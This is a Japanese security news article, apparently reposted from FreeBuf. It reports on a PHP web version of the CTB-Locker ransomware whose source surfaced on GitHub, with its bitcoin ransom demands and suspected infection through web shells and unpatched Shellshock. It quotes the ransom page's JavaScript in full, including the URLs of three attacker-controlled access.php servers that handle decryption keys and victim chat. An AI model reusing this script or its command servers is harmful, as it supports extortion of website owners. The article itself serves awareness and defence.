ランサムウェア CTB-Locker PHP ソース コードの Web 版が GitHub に登場

ランサムウェア CTB-Locker は Web に進化しており、Web サイトに感染する可能性があります。分析によると、コーディングは PHP で書かれており、ソース コードは GitHub でホストされています。

Web 版ランサムウェア CTB-Locker の初登場

今年の欧米でのバレンタインデーの直前に、英国の Web マスターは、自分が管理していた Web サイトのページが改ざんされていることに気付きました。改ざんされたページが表示される このメッセージは、悪意のあるランサムウェアに感染したコンピュータに似ています。主なメッセージは、サイトを通常の状態に戻すために、対応するディレクトリ ファイルの暗号化と引き換えにビットコインを支払うようサイト管理者に要求するものです。改ざんされたページは以下のとおりです。

この事件は、Web ページを対象とした初の恐喝事件として確認され、大きな注目を集めました。しかし実際には、サーバー管理者として、これが単なる 1 回限りのインシデントであり、攻撃者による計画的な攻撃の始まりではないことを願うばかりです。

実際、初期段階では他に感染者は検出されなかったのですが、ここ一週間で状況は大きく変わりました。この時期、前述のWebランサムウェア感染事件が多発しました。これまでに同様の事件が100件以上見つかっているという。改ざんされた情報では、背後の操作者が被害者に0.4ビットコインの支払いを要求し、2日以内に支払いが完了しない場合、支払い額は0.8ビットコインに増額されるという内容だった。以下は、ビットコインの支払いを必要とするそのソース コードです:

<script>admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];iadmin = 0;domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);function post_admin(postdata, onsuccess) {   $.post(admins[iadmin], postdata+"&domain="+domain, function (data) {         if (data["status"] == "success") {            onsuccess(data);         } else {            alert(data["status"]);         }      }, 'json'   ).fail(function() {      alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');      iadmin = (iadmin + 1) % 3;   });}$('#decrypt').click(function() {   post_admin("decrypt=", function(data) {      alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');      window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];   });});$('#dectest').click(function() {   post_admin("dectest=&secret="+($("#secret").val()), function(data) {      alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');      window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];   });});$('#sendmsg').click(function() {   msg = "&msg=" + encodeURIComponent($("#chatmsg").val());   post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {      alert('Thank you for feedback!');   });});$('#recvmsg').click(function() {   post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {      $("#chatmsg").val(data["answer"]);   });});   </script>

このランサムウェアは、身代金支払い通知の CTB-Locker と同じモデルを持っています。しかし、純粋に技術的な観点から見ると、これは「悪名高い」CTB-Locker ランサムウェアの状況と矛盾します。 Windows デスクトップ環境でのみ実行されるため、Linux Web サーバー上では実行できません。

CTB-Locker の Web バージョンは PHP で書かれています

Stormshield のセキュリティ アナリストである Benkow は、ランサムウェアの実行モードを分析し、感染したオブジェクトからソース コードを抽出することに成功しました。その後、ベンコウ氏は、他のセキュリティ研究者による分析と研究のために、Web バージョンの CTB-Locker のソース コードを KernelMode フォーラムにアップロードしました。 CTB-Locker の Web バージョンの「人気」は急速に高まり、そのソース コードも GitHub でホストされています。

ソース コードのアドレスをクリックしてください: GitHub

ランサムウェア Hidden Tear のソース コードも GitHub でホストされていたことを考えると、ユーザーにとって有益な方向には進みませんでした。現在の状況を踏まえると、今後数か月以内に Web サイトを標的とした大規模な攻撃や感染が発生する可能性が高いと予測されます。

Benkow の調査と分析によると、CTB-Locker の Web バージョンは PHP で書かれており、高強度の AES-256 暗号化アルゴリズムを使用しています。詳細については、GitHub 上のソースコードを参照してください。

感染ポイントはまだ不明です

ランサムウェアがどのようにサーバーホストに感染するのかはまだ発見されていません。統計的な観点から見ると、感染したホストは Linux と Windows のデュアル システムを実行しており、その大部分 (73%) で Exim サービス (SMTP サーバー) が有効になっていることが注目に値します。 Benkow 氏はまた、

これらのホストのほとんどは、「logout.php」動的ページを通じてアクセスできる Web シェルを実行していると付け加えました。

さらに、多くの感染サイトには依然として Shellshock 脆弱性が存在することが判明しており、この脆弱性に対するパッチは実際には 1 年以上前にリリースされていました。統計的な観点から見ると、最大の問題は、ほとんどのサイトが自分のサイトの脆弱性を無視して修復しない傾向があり、その結果、これらの脆弱性が攻撃者によって悪用されることです。

以前にもランサムウェアが Web サーバーに感染する事件がありました

2015 年 12 月、セキュリティ研究者は、Linux.Encoder ランサムウェア ファミリがすでに Web サーバーをターゲットにする機能を備えていることを発見しました。調査と分析によれば、Linux.Encoder は C および C++ を使用しています。 、これは CTB-Locker の Web バージョンとは何の関係もありません。

結論

セキュリティ状況がますます厳しくなる中、サイト管理者はサイトのバージョンを最新のものに更新する必要があります。同時に、可能であれば、複数のスキャン ツールを使用して管理サイトのクロスチェックと脆弱性スキャンを実行し、脆弱性をタイムリーに発見し、修復および強化できるようにする必要があります。

※参考元：soft、github、ker、FB編集者troy編集、FreeBuf Hackers and Geeks (FreeBuf.COM)から転載する場合は明記してください